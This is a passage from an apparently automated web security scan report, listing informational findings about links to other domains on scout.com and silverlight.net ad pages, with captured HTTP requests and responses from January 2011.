<li><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left">
                   <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
                   <a href="http://g.redacted/0TO_/enus">Legal</a>
                   <a href="http://advertising.redacted/msn/">Advertise on MSN</a>
                   <a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
                   <a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&amp;site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" />
   </noscript>
...[SNIP]...

22.452. http://www.scout.com/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search.aspx?s=143 HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:31 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14267

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.redacted/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left">
                   <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
                   <a href="http://g.redacted/0TO_/enus">Legal</a>
                   <a href="http://advertising.redacted/msn/">Advertise on MSN</a>
                   <a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
                   <a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&amp;site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" />
   </noscript>
...[SNIP]...

22.453. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:19 GMT
Content-Length: 355


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2552&SiteID=2&RandomNumber=537257586&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/SL-Dec-Jan-Develop.jpg" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.454. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:47 GMT
Content-Length: 390


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=520&AdvertiserID=51&BannerID=474&SiteID=6&RandomNumber=108728803&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/ClientUI%20ad4%20(728x90).jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.455. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=465&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/devices/windows-phone/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:27 GMT
Content-Length: 349


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=465&CampaignID=1858&AdvertiserID=9&BannerID=2574&SiteID=2&RandomNumber=888561024&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/300x250-WP7.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.456. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:12 GMT
Content-Length: 392


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=510&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=1705651638&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.457. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:15:45 GMT
Content-Length: 381


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1489354989&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.458. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:14:48 GMT
Content-Length: 381


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1776744983&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.459. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:12 GMT
Content-Length: 379


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=478&AdvertiserID=72&BannerID=350&SiteID=6&RandomNumber=1156413973&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2%20728-90-16.png" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.460. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:08 GMT
Content-Length: 362


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=401&CampaignID=1855&AdvertiserID=129&BannerID=2492&SiteID=2&RandomNumber=1760560210&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/W_DevSum11-bann_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.461. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:32:48 GMT
Content-Length: 380


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=136391486&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.462. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:37 GMT
Content-Length: 388


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=369&SiteID=6&RandomNumber=444363425&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/flexreports_1110_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.463. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:19 GMT
Content-Length: 380


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=537257586&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.464. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:43 GMT
Content-Length: 381


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1194057922&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.465. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Content-Length: 380


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=457&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=1024933072&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.466. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=38&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:37 GMT
Content-Length: 359


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=38&CampaignID=1848&AdvertiserID=12&BannerID=2631&SiteID=2&RandomNumber=1351504933&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/wijmo_charts_300x250.png" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.467. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

